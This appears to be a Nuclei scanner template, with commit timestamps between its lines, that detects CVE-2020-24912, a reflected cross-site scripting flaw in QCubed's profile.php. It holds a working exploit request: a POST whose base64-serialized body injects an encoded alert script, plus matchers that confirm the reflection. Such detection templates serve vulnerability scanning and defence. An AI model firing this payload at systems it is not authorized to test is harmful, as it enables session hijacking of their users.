2021-09-15 06:00:51 +00:00
id : CVE-2020-24912
info :
name : QCube Cross-Site-Scripting
author : pikpikcu
severity : medium
2022-05-17 09:18:12 +00:00
description : A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade to the latest version to mitigate this vulnerability.
2021-09-15 06:00:51 +00:00
reference :
- https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03
2022-03-25 11:45:10 +00:00
- https://github.com/qcubed/qcubed/pull/1320/files
2021-09-15 06:00:51 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-24912
2021-09-15 11:19:18 +00:00
- http://seclists.org/fulldisclosure/2021/Mar/30
2023-07-11 19:49:27 +00:00
- http://qcubed.com
2021-09-15 11:53:20 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-15 11:53:20 +00:00
cve-id : CVE-2020-24912
cwe-id : CWE-79
2023-11-18 12:52:17 +00:00
epss-score : 0.0018
2023-12-12 11:07:52 +00:00
epss-percentile : 0.5505
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : qcubed
product : qcubed
tags : cve,cve2020,qcubed,xss,seclists
2021-09-15 06:00:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-15 06:00:51 +00:00
- method : POST
path :
- "{{BaseURL}}/assets/_core/php/profile.php"
- "{{BaseURL}}/assets/php/profile.php"
- "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"
2023-07-11 19:49:27 +00:00
body : "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K="
2021-09-15 06:00:51 +00:00
headers :
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-09-15 06:00:51 +00:00
words :
2021-09-15 11:50:24 +00:00
- "<script>alert('xss')</script>"
2021-09-15 06:00:51 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2021-09-15 06:00:51 +00:00
words :
- 'Content-Type : text/html'
2023-12-12 12:02:03 +00:00
# digest: 4a0a004730450220028d1cc44b831a88ba9cdbdfccc03ad9380672982aedb982be39ea7f4a8592fb02210089d6d57e3240f86437104d6ffa521c4eed252a5c0da0814d74ef8ce2f0ca79a7:922c64590222798bb761d5b6d8e72950